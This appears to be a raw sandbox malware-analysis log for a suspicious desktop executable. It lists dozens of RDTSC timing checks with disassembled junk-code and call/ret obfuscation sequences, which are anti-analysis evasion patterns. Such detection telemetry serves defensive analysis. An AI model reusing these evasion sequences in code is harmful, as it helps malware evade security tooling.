Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF2341 second address: CF2346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF2346 second address: CF2350 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD7915682Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF0D79 second address: CF0D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF0D7D second address: CF0D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF2532 second address: CF2546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD78DE46AFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF2546 second address: CF255A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FDD79156826h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF255A second address: CF2564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF2564 second address: CF259B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDD79156826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push esi 0x0000000e jmp 00007FDD79156835h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDD7915682Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF3ED1 second address: CF3ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF3ED5 second address: CF3F1A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDD79156826h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d js 00007FDD79156862h 0x00000013 pushad 0x00000014 jmp 00007FDD79156833h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDD79156839h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CF3F1A second address: CF3F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CC1A22 second address: CC1A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFB73F second address: CFB754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FDD78DE46B0h 0x0000000b jmp 00007FDD78DE46AAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFB754 second address: CFB75F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007FDD79156826h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFB307 second address: CFB322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FDD78DE46ADh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFB322 second address: CFB345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FDD7915682Dh 0x0000000b popad 0x0000000c popad 0x0000000d jl 00007FDD79156843h 0x00000013 js 00007FDD7915682Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFB47E second address: CFB483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFB483 second address: CFB49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD79156830h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFD200 second address: CFD204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFD204 second address: CFD225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jnl 00007FDD79156831h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFD225 second address: CFD229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFDE16 second address: CFDE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFDE1A second address: CFDE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFDF0B second address: CFDF11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFE051 second address: CFE057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFE057 second address: CFE05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFE388 second address: CFE38E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CFE433 second address: CFE437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D00D1C second address: D00D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D017AD second address: D017CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FDD79156828h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D017CE second address: D017EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D022D7 second address: D02309 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDD79156828h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1856h], edi 0x00000015 push 00000000h 0x00000017 and edi, dword ptr [ebp+122D39E6h] 0x0000001d push 00000000h 0x0000001f xor edi, 7530C775h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 je 00007FDD79156826h 0x0000002f push edx 0x00000030 pop edx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D02DCC second address: D02DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D02DD0 second address: D02DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D02DD4 second address: D02DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D03851 second address: D03855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D06D86 second address: D06D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D06D93 second address: D06D98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D06D98 second address: D06D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D06D9E second address: D06E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007FDD79156837h 0x0000000d push 00000000h 0x0000000f mov edi, 494CB401h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FDD79156828h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2CEAh] 0x00000036 xchg eax, esi 0x00000037 push esi 0x00000038 jmp 00007FDD79156830h 0x0000003d pop esi 0x0000003e push eax 0x0000003f push ebx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D03FDD second address: D04002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FDD78DE46A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0B412 second address: D0B465 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDD7915682Ch 0x00000008 jng 00007FDD79156826h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D2BE5h], edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FDD79156828h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 or dword ptr [ebp+122D1856h], eax 0x00000039 push 00000000h 0x0000003b mov ebx, dword ptr [ebp+122D3CBAh] 0x00000041 push eax 0x00000042 jo 00007FDD79156834h 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D095FB second address: D096A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007FDD78DE46B2h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 call 00007FDD78DE46B4h 0x00000019 ja 00007FDD78DE46ACh 0x0000001f mov dword ptr [ebp+122D186Bh], ebx 0x00000025 pop ebx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FDD78DE46A8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 and bl, FFFFFFC1h 0x0000004a mov eax, dword ptr [ebp+122D0245h] 0x00000050 push ecx 0x00000051 jo 00007FDD78DE46BAh 0x00000057 jmp 00007FDD78DE46B4h 0x0000005c pop ebx 0x0000005d push FFFFFFFFh 0x0000005f cld 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 jmp 00007FDD78DE46B2h 0x00000069 pop ecx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0B465 second address: D0B469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0A5E7 second address: D0A676 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDD78DE46ACh 0x00000008 jnl 00007FDD78DE46A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FDD78DE46A8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d movzx edi, cx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov ebx, dword ptr [ebp+122D3AF2h] 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007FDD78DE46A8h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D2594h], eax 0x00000064 mov eax, dword ptr [ebp+122D1225h] 0x0000006a mov dword ptr [ebp+122D25E1h], ebx 0x00000070 push FFFFFFFFh 0x00000072 push eax 0x00000073 pushad 0x00000074 jmp 00007FDD78DE46ACh 0x00000079 push ecx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0C5E7 second address: D0C626 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDD79156839h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FDD79156826h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0C626 second address: D0C6BC instructions: 0x00000000 rdtsc 0x00000002 je 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FDD78DE46A8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov di, 83D1h 0x0000002a adc bx, D0B2h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FDD78DE46A8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b movsx edi, dx 0x0000004e push 00000000h 0x00000050 call 00007FDD78DE46B9h 0x00000055 push eax 0x00000056 pushad 0x00000057 popad 0x00000058 pop ebx 0x00000059 pop edi 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FDD78DE46B7h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0B608 second address: D0B6C2 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDD79156828h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDD7915682Dh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FDD79156828h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b jmp 00007FDD79156836h 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e pushad 0x0000003f mov dword ptr [ebp+124569E5h], ecx 0x00000045 popad 0x00000046 mov eax, dword ptr [ebp+122D094Dh] 0x0000004c mov edi, dword ptr [ebp+122D3C7Eh] 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push eax 0x00000057 call 00007FDD79156828h 0x0000005c pop eax 0x0000005d mov dword ptr [esp+04h], eax 0x00000061 add dword ptr [esp+04h], 0000001Ch 0x00000069 inc eax 0x0000006a push eax 0x0000006b ret 0x0000006c pop eax 0x0000006d ret 0x0000006e js 00007FDD7915683Bh 0x00000074 call 00007FDD79156834h 0x00000079 pop ebx 0x0000007a nop 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0C6BC second address: D0C6C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0B6C2 second address: D0B6C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0D700 second address: D0D706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0D706 second address: D0D70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0C7F5 second address: D0C7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0C7FA second address: D0C800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0C800 second address: D0C804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0E78E second address: D0E792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0C8AB second address: D0C8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0C8B2 second address: D0C8EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156836h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jo 00007FDD79156826h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDD79156830h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0F739 second address: D0F74A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0F74A second address: D0F74E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D106BF second address: D1071D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDD78DE46A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb di, CDE1h 0x00000012 push 00000000h 0x00000014 jmp 00007FDD78DE46B2h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FDD78DE46A8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 jo 00007FDD78DE46A9h 0x0000003b movzx ebx, si 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jne 00007FDD78DE46ACh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0F8FB second address: D0F8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0F8FF second address: D0F905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0F905 second address: D0F90A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D12591 second address: D125BA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007FDD78DE46B5h 0x00000012 jmp 00007FDD78DE46AFh 0x00000017 jnp 00007FDD78DE46ACh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0F9FA second address: D0FA04 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDD79156826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D14659 second address: D146AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c stc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FDD78DE46A8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D186Bh], edi 0x0000002f push 00000000h 0x00000031 jc 00007FDD78DE46ABh 0x00000037 add bx, D427h 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D146AF second address: D146B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D15856 second address: D158B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 or di, 18A5h 0x0000000d push 00000000h 0x0000000f xor edi, 38DB3F80h 0x00000015 call 00007FDD78DE46AFh 0x0000001a xor ebx, dword ptr [ebp+122D398Eh] 0x00000020 pop ebx 0x00000021 push 00000000h 0x00000023 jmp 00007FDD78DE46B3h 0x00000028 xor ebx, 6225361Eh 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FDD78DE46B9h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D16A9C second address: D16AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D16AA1 second address: D16AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D16AB5 second address: D16AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D1798D second address: D179AC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDD78DE46ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FDD78DE46ACh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D179AC second address: D179C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD79156835h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D10956 second address: D1095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
